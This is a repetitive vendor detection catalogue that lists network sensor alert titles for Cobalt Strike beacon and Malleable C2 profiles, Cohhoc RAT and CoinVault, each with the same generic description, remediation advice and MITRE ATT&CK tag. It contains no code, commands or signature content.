MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt STrike Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Beacon Activity (UNC2447)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (UNC2447)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (Wordpress Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Activity (Wordpress Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Activity (Wordpress Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (Amazon Profile) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (Bing Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (Custom Wordpress Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Beacon Observed

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon Observed (MASB UA)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike Beacon (WooCommerce Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Cobalt Strike C2 Profile (news_indexedimages)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Exfiltration

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 (Adobe RTMP)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile POST (JPEG)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile POST (PNG)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 Amazon Profile POST (RIFF)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Cobalt Strike Malleable C2 (Custom)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Custom)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Custom Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Havex APT)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M5

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (jquery Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Magnitude EK)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Meterpreter)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Microsoft Update GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (MSDN Query Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 OCSP Profile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (OneDrive)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (bg)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (btn_bg)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (extension.css)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (Teams) M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Profile (Teams) M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (QiHoo Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Request (Stackoverflow Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Safebrowse Profile) GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Safebrowse Profile) POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (TrevorForget Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Unknown Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 Webbug Profile

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (WooCommerce Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (WooCommerce Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (WooCommerce Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Malleable C2 (Wordpress Profile)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cobalt Strike Related Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Obfuscation - T1001

ET MALWARE Cohhoc RAT CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE CoinVault CnC Beacon M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CoinVault CnC Beacon M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE CoinVault POST M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

